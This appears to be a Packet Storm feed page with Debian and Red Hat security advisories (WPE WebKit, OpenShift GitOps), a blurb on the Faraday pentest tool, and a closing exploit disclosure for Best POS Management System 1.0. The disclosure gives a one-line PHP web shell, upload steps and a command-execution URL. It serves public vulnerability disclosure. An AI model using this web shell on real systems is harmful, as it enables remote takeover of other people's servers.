Debian Linux Security Advisory 5352-1 - An anonymous researcher discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5352-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
February 17, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : wpewebkit  
CVE ID         : CVE-2023-23529

The following vulnerabilities have been discovered in the WPE WebKit  
web engine:

CVE-2023-23529

    An anonymous researcher discovered that processing maliciously  
    crafted web content may lead to arbitrary code execution. Apple is  
    aware of a report that this issue may have been actively  
    exploited.

For the stable distribution (bullseye), this problem has been fixed in  
version 2.38.5-1~deb11u1.

We recommend that you upgrade your wpewebkit packages.

For the detailed security status of wpewebkit please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/wpewebkit

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmPut/YACgkQAAyEYu0C  
2ALzdQ/+JiHZbOIr708QorZwSUjVxCQdpCQ7GaSBlmyRoI+vJ2IJ091mIXQi441J  
lG7rd1vDVw/2YHmjgSZG9wyezMP5SNeYczfrFmZ3pmueR5Ki/qHi/oOVFCYkp5GR  
ErbyU0v6uO2Z6VvP30A43/jmWpNa261Jnj3kXJ818b/5ZZpB1JuDana86yY7k7h/  
vXB9XmsAcn1CqEBT+0tHlBQJOl3Fy+OppLZKwh2AQulthTZILSO+F43hhfycvshc  
ecQ9BWG5fKjlYA078RpKRXh4slmh4QrdShVRUeh7DudjpX+AJLUMzStrlQgF8lqK  
OnZ3H43Ap8OF5Y+IgvorqcHhWHUB/sPn+rNpVOiXx2GWQ0P2RPC+ofRYMdRahorr  
CQdoOGh3dEXBlh3qkeUJc6ont4ZQbzTdmJ8ek2otEkmafLpGQCBjdk+W084nSXBA  
wvI6ShSP/a3tT5tsEOdRaM90K89EwkHtO7DlisgtJbgQK5psT+0/m+LtKI20Nvn2  
y3OdNfEEW+fKIdH23B3s53ihWb6mnJUKEu3KbRyX7CRM5UqUOLVqP7J8Y8Qm57hs  
LRNLcPzYirxRTJvEjj23bqLZXVt1Uw/SgM36Gn1YShcAfvcxIGguIy05WUbkbD7V  
pUW+Xv9zjchSAaInZOJyrPFdH9a3GWRZFkn7WBd9xa9hYj6bcRE=  
=zqsP  
-----END PGP SIGNATURE-----

Debian Security Advisory 5352-1

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Faraday 4.3.3

Red Hat Security Advisory 2023-0803-01 - An update is now available for Red Hat OpenShift GitOps 1.7. Red Hat Product Security has rated this update as having a security impact of Important.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2023:0803-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0803  
Issue date:        2023-02-17  
CVE Names:         CVE-2021-4238 CVE-2022-3064 CVE-2022-23521   
                   CVE-2022-40303 CVE-2022-40304 CVE-2022-41903   
                   CVE-2022-47629 CVE-2023-23947   
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

* go-yaml: Improve heuristics preventing CPU/memory abuse by parsing  
malicious or large YAML documents (CVE-2022-3064)

* ArgoCD: Users with any cluster secret update access may update  
out-of-bounds cluster secrets (CVE-2023-23947)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be  
2163037 - CVE-2022-3064 go-yaml: Improve heuristics preventing CPU/memory abuse by parsing malicious or large YAML documents  
2167819 - CVE-2023-23947 ArgoCD: Users with any cluster secret update access may update out-of-bounds cluster secrets

5. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-3064  
https://access.redhat.com/security/cve/CVE-2022-23521  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-41903  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2023-23947  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+8eptzjgjWX9erEAQhUsg//XiUcpqnLag7kYJ95BmzCB3k/67MJ2k8A  
bhaIaDM464gSsNS/Z+HfJmaHR6OaOweD724SuNHT20kjP0M+PksgXhnB0xUdI6Lg  
h/nWdA9U7G1ZVvjvPSLVBo1Khc7UgKUHh1vUu9HlyPnBs0PFiFoRRfLGphN5Pr7F  
g1Xtu06skcLInL5hQCh/4Z4kbJXRkEOe0ElbvJP4TbAo8vE6bCbOWXJ2IGOc6JjN  
acleF1PQpGg1KmGW3o462hHWFKLPXAipq98oLb3+gsQznM3ikk/k0pRDKUSLizd1  
5jMkYTt0C3Lg054nymX+2fT4hCAfLxHzbf6KJMIhzK2TEqNsATZv/W2brk0UNk5v  
O5/YesqwFrOSmbY/eCCe3aMzUwxijEDcrNFlcjXcOo1arE0N2bn7Nmp61p8+LHTZ  
bdYuvJnSiz63tnosAlSrEJkJOEYnOUFmDqg8pfFwem86+JWAYb5AO4Vq9KHoE7C7  
WCITb0k0o7Maxa2ppm0XOJ9RH109uOmFWPPu7dpxfeBQKzYYjISapZWmDd7hJ2UA  
50VJSTasFVGOcXyMYGgVSOlbDNE+hXGolVjRbiXYnguSDQaNXC4X4jYex1cCawtu  
25V2zWLvXhMF77ymNhLJkAc7LpcS8C0Yp6MXkHd/qj72RTtBmMCG5fRD/HqY46Ox  
Fo6kwtEgc98=  
=utEH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0803-01

Red Hat Security Advisory 2023-0804-01 - An update is now available for Red Hat OpenShift GitOps 1.5. Red Hat Product Security has rated this update as having a security impact of Important.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2023:0804-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0804  
Issue date:        2023-02-17  
CVE Names:         CVE-2021-4238 CVE-2022-3064 CVE-2022-23521   
                   CVE-2022-40303 CVE-2022-40304 CVE-2022-41903   
                   CVE-2022-47629 CVE-2023-23947   
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.5.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

* go-yaml: Improve heuristics preventing CPU/memory abuse by parsing  
malicious or large YAML documents (CVE-2022-3064)

* ArgoCD: Users with any cluster secret update access may update  
out-of-bounds cluster secrets (CVE-2023-23947)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be  
2163037 - CVE-2022-3064 go-yaml: Improve heuristics preventing CPU/memory abuse by parsing malicious or large YAML documents  
2167819 - CVE-2023-23947 ArgoCD: Users with any cluster secret update access may update out-of-bounds cluster secrets

5. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-3064  
https://access.redhat.com/security/cve/CVE-2022-23521  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-41903  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2023-23947  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+8eo9zjgjWX9erEAQiOPg/+OeivacdZq0CEDwRXRWJKJPfz3IyrcHFH  
JEcqXIU1Oxp3BBgPZ7ZhledPaNHB2W+LPiZPe9Qm4S8N0lFdcFs7Cq00Aptrz7cn  
YXyfYVKarruo5blzb771wdhFQP7PoryVvkbqUK6Kv1uPGHjBk0pv/Gbq6ClsXtdz  
E7BnH6zL37WObwLVy8d9Ex8PWXlzF4UaHE0sJtnf1wvsBDSISPc/YNv63KIabOE7  
CV0KppbJ7ViOR8bEFB333vyc9HBLfIQ2of7SdcbeB8sLS55sC0V2JxiRvjcgTSHZ  
OTW1rS6eKq+1GnViCSYI2diqEEYgJaIjuKAW8l6AAGIPCfRHQ92yqqWCSzrBWczL  
XXVYQRzjcDwnpjfG1ubF6mf6uf4cbyDiRkT1/uGFerjQb82WfXH5Vv47Yjryw2iX  
u/G0gnP63xIBKH6r/uQUuX/S0RK6zzLj6+Dcgqs6/Qn+YITaeNcJQt+7rVRexz0P  
fk01LzB/i6HAaoWdpnoG/LBvUsfcIpvmVDAl12wFuU6yuNV/E5E+fvHvEQqIIt3c  
MGQKn2e+epGZ3+3qv6Ma4GnKjqJCEvdWSiolE2QV7VsKi+sp6223G2wmjRqUKMGC  
xDQ2D5BjXkHmKMUUCY9pCKlY486fDKJDkTvVu2oK1kOBOq8jYELfI5OBu8jh1Tgu  
SkBkF1ACbh0=  
=5vpQ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0804-01

Best POS Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Authenticated Remote Code Execution on File Upload# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA### Steps to Reproduce1- Login as Admin Rule2- Head to " http://localhost/kruxton/index.php?page=site_settings"3- Try to Upload an image here it will be a shell.php```shell.php``````<?php system($_GET['cmd']); ?>4- Head to http://localhost/kruxton/assets/uploads/5- Access your uploaded Shellhttp://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami

Source

Packet Storm